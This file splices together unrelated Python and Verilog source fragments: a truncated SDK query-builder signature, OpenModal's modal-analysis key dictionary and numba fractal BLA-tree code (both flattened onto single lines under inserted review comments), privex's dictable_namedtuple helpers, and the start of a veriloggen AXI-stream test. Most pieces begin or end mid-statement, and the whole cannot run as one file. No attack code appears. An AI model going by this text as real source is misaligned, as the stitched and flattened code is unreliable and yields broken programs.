None, app_type: Optional[Union[str, AppTypeEnum]] = None, available_date: Optional[str] = None, base_app_id: Optional[str] = None, category_path: Optional[str] = None, features: Optional[str] = None, item_type: Optional[Union[str, ItemTypeEnum]] = None, limit: Optional[int] = None, offset: Optional[int] = None, region: Optional[str] = None, sort_by: Optional[List[Union[str, SortByEnum]]] = None, store_id: Optional[str] = None, tags: Optional[str] = None, target_namespace: Optional[str] = None, ) -> QueryItems: instance = cls() instance.namespace = namespace
# NOTE(review): the chunk below is OpenModal's key-description module (GPLv3
# header, module docstring and the `keys` dict mapping identifiers to their
# 3-char acronym / 15-char label / full description).  Its newlines were
# stripped by an extraction step, and the dict literal is truncated mid-entry
# at the end of the chunk.  Content is preserved byte-for-byte -- restore the
# file from the upstream OpenModal repository rather than hand-repairing it.
# Copyright (C) 2014-2017 <NAME>, <NAME>, <NAME>, <NAME> (in alphabetic order) # # This file is part of OpenModal. # # OpenModal is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, version 3 of the License. # # OpenModal is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with OpenModal. If not, see <http://www.gnu.org/licenses/>. """Module for handling keys used in OpenModal. Typical use: keys['abscissa_axis_units_lab']['3'] 'key': { '3': '', # acronym up to 3 characters '15': '', # short description up to 15 characters 'desc': '' # full description } """ keys = { 'abscissa_axis_units_lab': { '3': 'x', '15': 'x axis units', 'desc': 'label for the units on the abscissa', }, 'abscissa_force_unit_exp': { '3': 'exp', '15': 'unit exponent', 'desc': 'exponent for the force unit on the abscissa', }, 'abscissa_inc': { '3': 'inc', '15': 'x axis incr.', 'desc': 'abscissa increment; 0 if spacing uneven', }, 'abscissa_len_unit_exp': { '3': 'exp', '15': 'x axis unit exp', 'desc': 'exponent for the length unit on the abscissa', }, 'abscissa_min': { '3': 'min', '15': 'x axis minimum', 'desc': 'abscissa minimum', }, 'abscissa_spacing': { '3': 'spa', '15': 'x axis spacing', 'desc': 'abscissa spacing; 0=uneven, 1=even', }, 'abscissa_spec_data_type': { '3': 'typ', '15': 'x axis type', 'desc': 'abscissa specific data type', }, 'abscissa_temp_unit_exp': { '3': 'exp', '15': 'x axis unit exp', 'desc': 'exponent for the temperature unit on the abscissa', }, 'analysis_id': { '3': 'aid', '15': 'analysis ID', 'desc': 'Analysis ID is used to distinguish between different analyses done in analysis tab.', }, 'analysis_type': { '3': 'typ', 
'15': 'analysis type', 'desc': 'analysis type number; currently only normal mode (2), complex eigenvalue first order (displacement) (3), frequency response and (5) and complex eigenvalue second order (velocity) (7) are supported', }, 'binary': { '3': 'bin', '15': 'Binary/ASCII', 'desc': '1 for Binary, 0 for ASCII format type', }, 'byte_ordering': { '3': 'byt', '15': 'byte ordering', 'desc': 'byte ordering', }, 'cmif': { '3': 'MIF', '15': 'CMIF', 'desc': 'The Complex Mode Indicator Function', }, 'color': { '3': 'col', '15': 'color', 'desc': 'color number', }, 'cyl_thz': { '3': 'thz', '15': 'x to y', 'desc': 'first Euler rotation', #for cylindrical coordinate system }, 'damp_err': { '3': 'err', '15': 'damp. err.', 'desc': 'Damping error', }, 'data': { '3': 'dat', '15': 'data', 'desc': 'data array', }, 'data_ch': { '3': 'dat', '15': 'data char. nr.', 'desc': 'data-characteristic number', }, 'data_type': { '3': 'typ', '15': 'data type', 'desc': 'data type number; 2 = real data, 5 = complex data', }, 'date_db_created': { '3': 'crt', '15': 'date DB created', 'desc': 'date database created', }, 'date_db_saved': { '3': 'sav', '15': 'date DB saved', 'desc': 'date database saved', }, 'date_file_written': { '3': 'wrt', '15': 'file written', 'desc': 'date file was written', }, 'db_app': { '3': 'nam', '15': 'DB app name', 'desc': 'name of the application that created the database', }, 'def_cs': { '3': 'cs', '15': 'def. cs numbers ', 'desc': 'n deformation cs numbers', }, # what is this? (Blaz) 'description': { '3': 'des', '15': 'description', 'desc': 'description of the model', }, 'disp_cs': { '3': 'cs', '15': 'disp cs numbers', 'desc': 'n displacement cs numbers', }, # what is this? 
(Blaz) 'eig': { '3': 'eig', '15': 'eigen frequency', 'desc': 'eigen frequency (complex number); applicable to analysis types 3 and 7 only', }, 'eig_real': { '3': 'ere', '15': 'eigen freq [Hz]', 'desc': 'real part of eigen frequency; applicable to analysis types 3 and 7 only', }, 'eig_xi': { '3': 'exi', '15': 'damping factor [/]', 'desc': 'damping factor; applicable to analysis types 3 and 7 only', }, 'element_descriptor': { '3': 'eds', '15': 'element type', 'desc': 'description of element type', }, 'element_id': { '3': 'eid', '15': 'element id', 'desc': 'id number of an element', }, 'file_type': { '3': 'typ', '15': 'file type', 'desc': 'file type string', }, 'force': { '3': 'for', '15': 'force', 'desc': 'force factor', }, 'fp_format': { '3': 'fp', '15': 'fp format', 'desc': 'floating-point format', }, 'freq': { '3': 'fre', '15': 'frequency', 'desc': 'frequency (Hz); applicable to analysis types 2 and 5 only', }, 'freq_err': { '3': 'err', '15': 'freq. err.', 'desc': 'frequency error', }, 'freq_max': { '3': 'max', '15': 'max. freq.', 'desc': 'maximal frequency', }, 'freq_min': { '3': 'min', '15': 'min. freq.', 'desc': 'Minimal frequency', }, 'freq_step_n': { '3': 'stp', '15': 'freq. 
step nr.', 'desc': 'frequency step number; applicable to analysis type 5 only', }, 'frf': { '3': 'FRF', '15': 'FRF', 'desc': 'Frequency Response Function', }, 'func_type': { '3': 'fun', '15': 'function type', 'desc': 'function type; only 1, 2, 3, 4 and 6 are supported', }, 'id': { '3': 'id', '15': 'id', 'desc': 'id string', }, 'id1': { '3': 'id1', '15': 'id1', 'desc': 'id1 string', }, 'id2': { '3': 'id2', '15': 'id2', 'desc': 'id2 string', }, 'id3': { '3': 'id3', '15': 'id3', 'desc': 'id3 string', }, 'id4': { '3': 'id4', '15': 'id4', 'desc': 'id4 string', }, 'id5': { '3': 'id5', '15': 'id5', 'desc': 'id5 string', }, 'length': { '3': 'len', '15': 'length', 'desc': 'length factor', }, 'lines': { '3': 'lin', '15': 'line numbers', 'desc': 'list of n line numbers', }, 'load_case': { '3': 'loa', '15': 'load case', 'desc': 'load case number', }, 'load_case_id': { '3': 'loa', '15': 'load case id', 'desc': 'id number for the load case', }, 'max_order': { '3': 'max', '15': 'max. order', 'desc': 'maximum model order', }, 'modal_a': { '3': 'mod', '15': 'modal a', 'desc': 'modal-a (complex number); applicable to analysis types 3 and 7 only', }, 'modal_b': { '3': 'mod', '15': 'modal b', 'desc': 'modal-b (complex number); applicable to analysis types 3 and 7 only', }, 'modal_damp_his': { '3': 'dmp', '15': 'modal damp. 
his', 'desc': 'modal hysteretic damping ratio; applicable to analysis type 2 only', }, 'modal_damp_vis': { '3': 'dmp', '15': 'modal damp vis', 'desc': 'modal viscous damping ratio; applicable to analysis type 2 only', }, 'modal_m': { '3': 'mod', '15': 'modal mass', 'desc': 'modal mass; applicable to analysis type 2 only', }, 'mode_n': { '3': 'mod', '15': 'mode number', 'desc': 'mode number; applicable to analysis types 2, 3 and 7 only', }, 'model_id': { '3': 'mid', '15': 'model ID', 'desc': 'id number of the model', }, 'model_name': { '3': 'mod', '15': 'model name', 'desc': 'the name of the model', }, 'model_type': { '3': 'mod', '15': 'model type', 'desc': 'model type number', }, 'n_ascii_lines': { '3': 'nr', '15': 'ascii lines nr', 'desc': 'number of ascii lines', }, 'n_bytes': { '3': 'nr', '15': 'nr of bytes', 'desc': 'number of bytes', }, 'n_data_per_node': { '3': 'nr', '15': 'nr of data', 'desc': 'number of data per node (DOFs)', }, 'n_nodes': { '3': 'nr', '15': 'nr of nodes', 'desc': 'number of nodes', }, 'nr_of_nodes': { '3': 'nrn', '15': 'node count', 'desc': 'number of nodes per element', }, 'node_nums': { '3': 'nr', '15': 'node nums', 'desc': 'node numbers', }, 'num_pts': { '3': 'pts', '15': 'nr of pts', 'desc': 'number of data pairs for uneven abscissa or number of data values for even abscissa', }, 'ord_data_type': { '3': 'typ', '15': 'ord data type', 'desc': 'ordinate data type', }, 'orddenom_axis_units_lab': { '3': 'y', '15': 'y axis units', 'desc': 'label for the units on the ordinate denominator', }, 'orddenom_force_unit_exp': { '3': 'exp', '15': 'unit exponent', 'desc': 'exponent for the force unit on the ordinate denominator', }, 'orddenom_len_unit_exp': { '3': 'exp', '15': 'y axis unit exp', 'desc': 'exponent for the length unit on the ordinate denominator', }, 'orddenom_spec_data_type': { '3': 'typ', '15': 'y axis type', 'desc': 'ordinate denominator specific data type', }, 'orddenom_temp_unit_exp': { '3': 'exp', '15': 'y axis unit exp', 'desc': 
'exponent for the temperature unit on the ordinate denominator', }, 'ordinate_axis_units_lab': { '3': 'y', '15':
# NOTE(review): the chunk below is numba-njit'ed BLA (bivariate linear
# approximation) tree construction code (init_BLA, init_BLA_BS, _stages_bla,
# combine_BLA, combine_BLA_BS, compress_BLA) whose newlines were stripped by
# an extraction step.  The first definition's opening lines and the tail of
# compress_BLA fall outside this chunk, and the code references BLA_index and
# STG_COMPRESSED defined elsewhere in the file.  Content is preserved
# byte-for-byte -- restore proper formatting from the upstream source.
= np.zeros((2 * ref_orbit_len,), dtype=numba.float64) M_bla_new, r_bla_new, bla_len, stages = init_BLA_BS( M_bla, r_bla, Zn_path, dfxdx, dfxdy, dfydx, dfydy, kc_std, eps ) return M_bla_new, r_bla_new, bla_len, stages @numba.njit def init_BLA(M_bla, r_bla, Zn_path, dfdz, kc_std, eps): """ Initialize BLA tree at stg 0 """ ref_orbit_len = Zn_path.shape[0] # at order + 1, we wrap for i in range(ref_orbit_len): i_0 = 2 * i # BLA index for (i, 0) # Define a BLA_step by: # [ M[0] 0 0] # M = [ 0 M[0] M[1]] # [ 0 0 1] # # [dzndc] # Zn = [ zn] # [ c] # # Z_(n+1) = M * Zn Zn_i = Zn_path[i] M_bla[i_0, 0] = dfdz(Zn_i) M_bla[i_0, 1] = 1. # We use the following criteria : # |Z + z| shall stay *far* from O or discontinuity of F', for each c # For std Mandelbrot it means from z = 0 # |zn| << |Zn| # For Burning ship x = 0 or y = 0 # |zn| << |Xn|, |zn| << |Yn| # We could additionnally consider a criterian based on hessian # |z| < A e / h where h Hessian - not useful (redundant) # for Mandelbrot & al. mZ = np.abs(Zn_path[i]) ii = (i + 1) % ref_orbit_len mZZ = np.abs(Zn_path[ii]) # mA = np.abs(M_bla[i_0, 0]) r_bla[i_0] = max( 0., min( # error term is negligible mZ * eps, # Avoid dyn glitch at next step mZZ * eps # ((0.5 * mZZ) - kc_std) / (1. 
+ mA) ) ) # Now the combine step # number of needed "stages" (ref_orbit_len).bit_length() stages = _stages_bla(ref_orbit_len) for stg in range(1, stages): combine_BLA(M_bla, r_bla, kc_std, stg, ref_orbit_len, eps) M_bla_new, r_bla_new, bla_len = compress_BLA(M_bla, r_bla, stages) return M_bla_new, r_bla_new, bla_len, stages @numba.njit def init_BLA_BS(M_bla, r_bla, Zn_path, dfxdx, dfxdy, dfydx, dfydy, kc_std, eps): """ Initialize BLA tree at stg 0 """ ref_orbit_len = Zn_path.shape[0] # at order + 1, we wrap for i in range(ref_orbit_len): i_0 = 2 * i # BLA index for (i, 0) # Define a BLA_step by: # Z_(n+1) = M * Zn where # [dxnda] # [dxndb] # [dynda] [ M_0 0 0] # Zn = [dyndb] M = [ 0 M_1 M_2] # [ xn] [ 0 0 I] # [ yn] # [ a] # [ b] # [M[0] 0 M[1] 0 ] # M_0 = [0 M[0] 0 M[1]] # [M[2] 0 M[3] 0 ] # [0 M[2] 0 M[3]] # # M_1 = [M[0] M[1]] M_1_init = [dfxdx dfxdy] # [M[2] M[3]] [dfydx dfydy] # # M_2 = [M[4] M[5]] M_2_init = [1 0] # [M[6] M[7]] [0 -1] # Zn_i = Zn_path[i] Xn_i = Zn_i.real Yn_i = Zn_i.imag M_bla[i_0, 0] = dfxdx(Xn_i, Yn_i) M_bla[i_0, 1] = dfxdy(Xn_i, Yn_i) M_bla[i_0, 2] = dfydx(Xn_i, Yn_i) M_bla[i_0, 3] = dfydy(Xn_i, Yn_i) M_bla[i_0, 4] = 1. M_bla[i_0, 5] = 0. M_bla[i_0, 6] = 0. M_bla[i_0, 7] = -1. mZ = min(abs(Xn_i), abs(Yn_i)) # ii = (i + 1) % ref_orbit_len r_bla[i_0] = mZ * eps # Now the combine step # number of needed "stages" i.e. 
(ref_orbit_len).bit_length() stages = _stages_bla(ref_orbit_len) for stg in range(1, stages): combine_BLA_BS(M_bla, r_bla, kc_std, stg, ref_orbit_len, eps) M_bla_new, r_bla_new, bla_len = compress_BLA(M_bla, r_bla, stages) return M_bla_new, r_bla_new, bla_len, stages @numba.njit def _stages_bla(ref_orbit_len): """ number of needed "stages" (ref_orbit_len).bit_length() """ return int(np.ceil(np.log2(ref_orbit_len))) @numba.njit def combine_BLA(M, r, kc_std, stg, ref_orbit_len, eps): """ Populate successive stages of a BLA tree A_bla, B_bla, r_bla : data of the BLA tree kc : majorant of |c| stg : stage of the tree that is populated by merging (stg - 1) items ref_orbit_len : the len for the reference orbit """ # Combine all BVA at stage stg-1 to make stage stg with stg > 0 step = (1 << stg) for i in range(0, ref_orbit_len - step, step): ii = i + (step // 2) # If ref_orbit_len is not a power of 2, we might get outside the array if ii >= ref_orbit_len: break index1 = BLA_index(i, stg - 1) index2 = BLA_index(ii, stg - 1) index_res = BLA_index(i, stg) # Combines linear approximations # M_res = [ M2[0] M2[1]] * [ M1[0] M1[1]] # [ 0 1] [ 0 1] M[index_res, 0] = M[index2, 0] * M[index1, 0] M[index_res, 1] = M[index2, 0] * M[index1, 1] + M[index2, 1] # Combines the validity radii r1 = r[index1] r2 = r[index2] # r1 is a direct criteria however for r2 we need to go 'backw the flow' # z0 -> z1 -> z2 with z1 = A1 z0 + B1 c, |z1| < r2 mA1 = np.abs(M[index1, 0]) mB1 = np.abs(M[index1, 1]) r2_backw = max(0., (r2 - mB1 * kc_std) / (mA1 + 1.)) # might use eps ? 
r[index_res] = min(r1, r2_backw) @numba.njit def combine_BLA_BS(M, r, kc_std, stg, ref_orbit_len, eps): """ Populate successive stages of a BLA tree A_bla, B_bla, r_bla : data of the BLA tree kc : majorant of |c| stg : stage of the tree that is populated by merging (stg - 1) items ref_orbit_len : the len for the reference orbit """ # Combine all BVA at stage stg-1 to make stage stg with stg > 0 step = (1 << stg) for i in range(0, ref_orbit_len - step, step): ii = i + (step // 2) # If ref_orbit_len is not a power of 2, we might get outside the array if ii >= ref_orbit_len: break index1 = BLA_index(i, stg - 1) index2 = BLA_index(ii, stg - 1) index_res = BLA_index(i, stg) # Combines linear approximations # M = [M2_1 M2_2] x [M1_1 M1_2] # [ 0 I] [ 0 I] # Mx_1 = [M[0] M[1]] Mx_2 = [M[4] M[5]] # [M[2] M[3]] [M[6] M[7]] # Mres_1 = M2_1 * M1_1 # Mres_2 = M2_1 * M1_1 + M2_2 # Mres_1 = M2_1 * M1_1 : M[index_res, 0] = ( M[index2, 0] * M[index1, 0] + M[index2, 1] * M[index1, 2] ) M[index_res, 1] = ( M[index2, 0] * M[index1, 1] + M[index2, 1] * M[index1, 3] ) M[index_res, 2] = ( M[index2, 2] * M[index1, 0] + M[index2, 3] * M[index1, 2] ) M[index_res, 3] = ( M[index2, 2] * M[index1, 1] + M[index2, 3] * M[index1, 3] ) # Mres_2 = M2_1 * M1_1 + M2_2 M[index_res, 4] = ( M[index2, 0] * M[index1, 4] + M[index2, 1] * M[index1, 6] + M[index2, 4] ) M[index_res, 5] = ( M[index2, 0] * M[index1, 5] + M[index2, 1] * M[index1, 7] + M[index2, 5] ) M[index_res, 6] = ( M[index2, 2] * M[index1, 4] + M[index2, 3] * M[index1, 6] + M[index2, 6] ) M[index_res, 7] = ( M[index2, 2] * M[index1, 5] + M[index2, 3] * M[index1, 7] + M[index2, 7] ) # Combines the validity radii r1 = r[index1] r2 = r[index2] # r1 is a direct criteria however for r2 we need to go 'backw the flow' # z0 -> z1 -> z2 with z1 = A1 z0 + B1 c, |z1| < r2 mA1 = max( np.abs(M[index1, 0]), np.abs(M[index1, 1]), np.abs(M[index1, 2]), np.abs(M[index1, 3]), ) mB1 = max( np.abs(M[index1, 4]), np.abs(M[index1, 5]), np.abs(M[index1, 6]), 
np.abs(M[index1, 7]), ) r2_backw = max(0., (r2 - mB1 * kc_std) / (mA1 + 1.)) # might use eps ? r[index_res] = min(r1, r2_backw) @numba.njit def compress_BLA(M_bla, r_bla, stages): """ We build 'compressed' arrays which only feature multiples of 2 ** STG_COMPRESSED """ k_comp = 1 << STG_COMPRESSED ref_orbit_len = M_bla.shape[0] // 2 new_len = M_bla.shape[0] // k_comp bla_dim = M_bla.shape[1] M_bla_new = np.zeros((new_len * bla_dim,), dtype=M_bla.dtype) r_bla_new = np.zeros((new_len,), dtype=numba.float64) for stg in range(STG_COMPRESSED, stages): step = (1 << stg) for i in range(0, ref_orbit_len - step, step): index = BLA_index(i, stg) new_index = BLA_index(i // k_comp,
        if not all(type(n) == str for n in f):
            return False
    return True


def convert_dictable_namedtuple(nt_instance, typename=None, module=None, **kwargs) -> Union[NamedTuple, Dict]:
    """
    Convert an existing :func:`collections.namedtuple` instance into a dictable_namedtuple instance.

    **Example**

    First we create a namedtuple type ``Person``

        >>> from collections import namedtuple
        >>> Person = namedtuple('Person', 'first_name last_name')

    Next we create an instance of ``Person`` called <NAME>, and we can confirm it's a normal namedtuple, as we
    can't access first_name by item/key.

        >>> john = Person('John', 'Doe')
        >>> john['first_name']
        TypeError: tuple indices must be integers or slices, not str

    Using :func:`.convert_dictable_namedtuple`, we can convert ``john`` from a normal ``namedtuple``, into
    a ``dictable_namedtuple``. This enables many convenience features (see :func:`.dictable_namedtuple` for
    more info) such as easy casting to a :class:`dict`, and accessing fields by item/key (square brackets)::

        >>> from privex.helpers import convert_dictable_namedtuple
        >>> d_john = convert_dictable_namedtuple(john)
        >>> d_john
        Person(first_name='John', last_name='Doe')
        >>> d_john['first_name']
        'John'
        >>> dict(d_john)
        {'first_name': 'John', 'last_name': 'Doe'}

    :param nt_instance: An instantiated namedtuple object (using a type returned from :func:`collections.namedtuple`)
    :param str typename: Optionally, you can change the name of your instance's class, e.g. if you provide a
                         ``Person`` instance, but you set this to ``Man``, then this will return a ``Man``
                         instance, like so: ``Man(first_name='John', last_name='Doe')``
    :param str module: Optionally, you can change the module that the type class belongs to. Otherwise it will
                       inherit the module path from the class of your instance.
    :key bool read_only: (Default: ``False``) If set to ``True``, the outputted dictable_namedtuple instance will
                         not allow new fields to be created via attribute / item setting.
    :return dictable_namedtuple: The instance you passed ``nt_instance``, converted into a dictable_namedtuple
    """
    nt_class = nt_instance.__class__
    # Default the module to the module of the instance's own class.
    module = nt_class.__module__ if module is None else module
    # Build a dictable_namedtuple *type* from the instance's class, then re-create
    # the instance's data on that new type.
    dnt_class = subclass_dictable_namedtuple(nt_class, typename=typename, module=module, **kwargs)
    return dnt_class(**nt_instance._asdict())


def subclass_dictable_namedtuple(named_type: type, typename=None, module=None, **kwargs) -> type:
    """
    Convert an existing :func:`collections.namedtuple` **type** into a dictable_namedtuple.

    If you have an INSTANCE of a type (e.g. it has data attached), use :func:`.convert_dictable_namedtuple`

    **Example**::

        >>> from collections import namedtuple
        >>> from privex.helpers import subclass_dictable_namedtuple
        >>> # Create a namedtuple type called 'Person'
        >>> orig_Person = namedtuple('Person', 'first_name last_name')
        >>> # Convert the 'Person' type into a dictable_namedtuple
        >>> Person = subclass_dictable_namedtuple(orig_Person)
        >>> john = Person('John', 'Doe')   # Create an instance of this dictable_namedtuple Person
        >>> john['middle_name'] = 'Davis'

    :param type named_type: A NamedTuple type returned from :func:`collections.namedtuple`
    :param str typename: Optionally, you can change the name of your type, e.g. if you provide a ``Person``
                         class type, but you set this to ``Man``, then this will return a ``Man`` class type.
    :param str module: Optionally, you can change the module that the type class belongs to. Otherwise it will
                       inherit the module path from ``named_type``.
    :key bool read_only: (Default: ``False``) If set to ``True``, the outputted dictable_namedtuple type will not
                         allow new fields to be created via attribute / item setting.
    :return type dictable_namedtuple: Your ``named_type`` converted into a dictable_namedtuple type class.
    """
    typename = named_type.__name__ if typename is None else typename
    module = named_type.__module__ if module is None else module
    read_only = kwargs.pop('read_only', False)
    # Rebuild the type from its field list with the dictable method set injected.
    _dt = make_dict_tuple(typename, ' '.join(named_type._fields), read_only=read_only)
    if module is None:
        # NOTE(review): normally unreachable, since ``module`` was already defaulted
        # from ``named_type.__module__`` above — kept as a fallback to the caller's module.
        try:
            module = sys._getframe(1).f_globals.get('__name__', '__main__')
        except (AttributeError, ValueError):
            pass
    if module is not None:
        _dt.__module__ = module
    return _dt


def make_dict_tuple(typename, field_names, *args, **kwargs):
    """
    Generates a :func:`collections.namedtuple` type, with added / modified methods injected to make it
    into a ``dictable_namedtuple``.

    Note: You probably want to be using :func:`.dictable_namedtuple` instead of calling this directly.
    """
    read_only = kwargs.pop('read_only', False)
    module = kwargs.pop('module', None)
    # Create a namedtuple type to use as a base
    BaseNT = namedtuple(typename, field_names, **kwargs)

    def __init__(self, *args, **kwargs):
        # Store values in the instance __dict__ (not tuple slots); '_extra_items' holds
        # fields created after instantiation, since namedtuple fields are otherwise fixed.
        self.__dict__['_extra_items'] = dict()
        for i, a in enumerate(list(args)):
            self.__dict__[self._fields[i]] = a
        for k, a in kwargs.items():
            self.__dict__[k] = a

    def __iter__(self):
        """This ``__iter__`` method allows for casting a dictable_namedtuple instance using ``dict(my_nt)``"""
        for k in self._fields:
            yield (k, getattr(self, k),)

    def __getitem__(self, item):
        """Handles when a dictable_namedtuple instance is accessed like ``my_nt['abc']`` or ``my_nt[0]``"""
        # Integer keys index positionally through _fields; anything else is attribute access.
        if type(item) is int:
            return self.__dict__[self._fields[item]]
        return getattr(self, item)

    def __getattr__(self, item):
        """Handles when a dictable_namedtuple instance is accessed like ``my_nt.abcd``"""
        # Dynamically-added fields live in _extra_items; fall back to normal attribute lookup.
        try:
            _v = object.__getattribute__(self, '_extra_items')
            return _v[item]
        except (KeyError, AttributeError):
            return object.__getattribute__(self, item)

    def __setitem__(self, key, value):
        """Handles when a dictable_namedtuple instance is accessed like ``my_nt['abc'] = 'def'``"""
        # Existing fields may always be updated; new fields are rejected when read-only.
        if hasattr(self, key):
            return tuple.__setattr__(self, key, value)
        if self._READ_ONLY:
            raise KeyError(f"{self.__class__.__name__} is read only. You cannot set a non-existent field.")
        self._extra_items[key] = value
        if key not in self._fields:
            # Register the new field so iteration / repr include it.
            tuple.__setattr__(self, '_fields', self._fields + (key,))

    def __setattr__(self, key, value):
        """Handles when a dictable_namedtuple instance is accessed like ``my_nt.abcd = 'def'``"""
        if key in ['_extra_items', '_fields'] or key in self._fields:
            return tuple.__setattr__(self, key, value)
        if self._READ_ONLY:
            raise AttributeError(f"{self.__class__.__name__} is read only. You cannot set a non-existent field.")
        self._extra_items[key] = value
        if key not in self._fields:
            tuple.__setattr__(self, '_fields', self._fields + (key,))

    def _asdict(self):
        """
        The original namedtuple ``_asdict`` doesn't work with our :meth:`.__iter__`, so we override it
        for compatibility. Simply calls ``return dict(self)`` to convert the instance to a dict.
        """
        return dict(self)

    def __repr__(self):
        _n = ', '.join(f"{name}='{getattr(self, name)}'" for name in self._fields)
        return f"{self.__class__.__name__}({_n})"

    # Inject our methods defined above into the namedtuple type BaseNT
    BaseNT.__getattr__ = __getattr__
    BaseNT.__getitem__ = __getitem__
    BaseNT.__setitem__ = __setitem__
    BaseNT.__setattr__ = __setattr__
    BaseNT._asdict = _asdict
    BaseNT.__repr__ = __repr__
    BaseNT.__iter__ = __iter__
    BaseNT.__init__ = __init__
    BaseNT._READ_ONLY = read_only

    # Create a class for BaseNT with tuple + object mixins, allowing things like __dict__ to function properly
    # and allowing for tuple.__setattr__ / object.__getattribute__ calls.
    class K(BaseNT, tuple, object):
        pass

    # Get the calling module so we can overwrite the module name of the class.
    if module is None:
        try:
            module = sys._getframe(1).f_globals.get('__name__', '__main__')
        except (AttributeError, ValueError):
            pass
    # Overwrite the type name + module to match the originally requested typename
    K.__name__ = BaseNT.__name__
    K.__qualname__ = BaseNT.__qualname__
    K.__module__ = module
    return K


def dictable_namedtuple(typename, field_names, *args, **kwargs) -> Union[Type[namedtuple], dict]:
    """
    Creates a dictable_namedtuple type for instantiation (same usage as :func:`collections.namedtuple`) -
    unlike namedtuple, dictable_namedtuple instances allow item (dict-like) field access, support writing
    and can be painlessly converted into dictionaries via ``dict(my_namedtuple)``.

    Named tuple instances created from ``dictable_namedtuple`` types are generally backwards compatible
    with any code that expects a standard :func:`collections.namedtuple` type instance.

    **Quickstart**

        >>> from privex.helpers import dictable_namedtuple
        >>> # Define a dictable_namedtuple type of 'Person', which has two fields - first_name and last_name
        >>> p = dictable_namedtuple('Person', 'first_name last_name')
        >>> john = p('John', 'Doe')  # Alternatively you can do p(first_name='John', last_name='Doe')
        >>> john.first_name          # You can retrieve keys either via attributes (dot notation)
        'John'
        >>> john['last_name']        # Via named keys (square brackets)
        'Doe'
        >>> john[1]                  # Or, via indexed keys (square brackets, with integer keys)
        'Doe'
        >>> john.middle_name = 'Davis'   # You can also update / set new keys via attribute/key/index
        >>> dict(john)               # Newly created keys will show up as normal in dict(your_object)
        {'first_name': 'John', 'last_name': 'Doe', 'middle_name': 'Davis'}
        >>> john                     # As well as in the representation in the REPL or when str() is called.
Person(first_name='John', last_name='Doe', middle_name='Davis') This function adds / overrides the following methods on the generated namedtuple type: * _asdict * __iter__ * __getitem__ * __getattribute__ * __setitem__ * __setattr__ * __repr__ Extra functionality compared to the standard :func:`.namedtuple` generated classes: * Can access fields via item/key: ``john['first_name']`` * Can convert instance into a dict simply by casting: ``dict(john)`` * Can set new items/attributes on an instance, even if they weren't previously defined. ``john['middle_name'] = 'Davis'`` or ``john.middle_name = 'Davis'`` **Example Usage** First we'll create a named tuple typle called ``Person``, which takes two arguments, first_name and last_name. >>> from privex.helpers import dictable_namedtuple >>> Person = dictable_namedtuple('Person', 'first_name last_name') Now we'll create an instance of ``Person`` called ``john``. These instances look like normal ``namedtuple``'s, and should be generally compatible with any functions/methods which deal with named tuple's. >>>
from __future__ import absolute_import from __future__ import print_function import os import veriloggen import axi_stream expected_verilog = """ module blinkled ( input CLK, input RST, input [32-1:0] axi_a_tdata, input axi_a_tvalid, output axi_a_tready, input axi_a_tlast, output reg [32-1:0] axi_b_tdata, output reg axi_b_tvalid, input axi_b_tready, output reg axi_b_tlast, input [32-1:0] saxi_awaddr, input [4-1:0] saxi_awcache, input [3-1:0] saxi_awprot, input saxi_awvalid, output saxi_awready, input [32-1:0] saxi_wdata, input [4-1:0] saxi_wstrb, input saxi_wvalid, output saxi_wready, output [2-1:0] saxi_bresp, output reg saxi_bvalid, input saxi_bready, input [32-1:0] saxi_araddr, input [4-1:0] saxi_arcache, input [3-1:0] saxi_arprot, input saxi_arvalid, output saxi_arready, output reg [32-1:0] saxi_rdata, output [2-1:0] saxi_rresp, output reg saxi_rvalid, input saxi_rready ); wire _axi_a_read_req_fifo_enq; wire [105-1:0] _axi_a_read_req_fifo_wdata; wire _axi_a_read_req_fifo_full; wire _axi_a_read_req_fifo_almost_full; wire _axi_a_read_req_fifo_deq; wire [105-1:0] _axi_a_read_req_fifo_rdata; wire _axi_a_read_req_fifo_empty; wire _axi_a_read_req_fifo_almost_empty; assign _axi_a_read_req_fifo_enq = 0; assign _axi_a_read_req_fifo_wdata = 'hx; assign _axi_a_read_req_fifo_deq = 0; _axi_a_read_req_fifo inst__axi_a_read_req_fifo ( .CLK(CLK), .RST(RST), ._axi_a_read_req_fifo_enq(_axi_a_read_req_fifo_enq), ._axi_a_read_req_fifo_wdata(_axi_a_read_req_fifo_wdata), ._axi_a_read_req_fifo_full(_axi_a_read_req_fifo_full), ._axi_a_read_req_fifo_almost_full(_axi_a_read_req_fifo_almost_full), ._axi_a_read_req_fifo_deq(_axi_a_read_req_fifo_deq), ._axi_a_read_req_fifo_rdata(_axi_a_read_req_fifo_rdata), ._axi_a_read_req_fifo_empty(_axi_a_read_req_fifo_empty), ._axi_a_read_req_fifo_almost_empty(_axi_a_read_req_fifo_almost_empty) ); reg [4-1:0] count__axi_a_read_req_fifo; wire [8-1:0] _axi_a_read_op_sel_fifo; wire [32-1:0] _axi_a_read_local_addr_fifo; wire [32-1:0] 
_axi_a_read_local_stride_fifo; wire [33-1:0] _axi_a_read_local_size_fifo; wire [8-1:0] unpack_read_req_op_sel_0; wire [32-1:0] unpack_read_req_local_addr_1; wire [32-1:0] unpack_read_req_local_stride_2; wire [33-1:0] unpack_read_req_local_size_3; assign unpack_read_req_op_sel_0 = _axi_a_read_req_fifo_rdata[104:97]; assign unpack_read_req_local_addr_1 = _axi_a_read_req_fifo_rdata[96:65]; assign unpack_read_req_local_stride_2 = _axi_a_read_req_fifo_rdata[64:33]; assign unpack_read_req_local_size_3 = _axi_a_read_req_fifo_rdata[32:0]; assign _axi_a_read_op_sel_fifo = unpack_read_req_op_sel_0; assign _axi_a_read_local_addr_fifo = unpack_read_req_local_addr_1; assign _axi_a_read_local_stride_fifo = unpack_read_req_local_stride_2; assign _axi_a_read_local_size_fifo = unpack_read_req_local_size_3; reg [8-1:0] _axi_a_read_op_sel_buf; reg [32-1:0] _axi_a_read_local_addr_buf; reg [32-1:0] _axi_a_read_local_stride_buf; reg [33-1:0] _axi_a_read_local_size_buf; reg _axi_a_read_data_idle; wire _axi_a_read_idle; assign _axi_a_read_idle = _axi_a_read_req_fifo_empty && _axi_a_read_data_idle; wire _axi_b_write_req_fifo_enq; wire [105-1:0] _axi_b_write_req_fifo_wdata; wire _axi_b_write_req_fifo_full; wire _axi_b_write_req_fifo_almost_full; wire 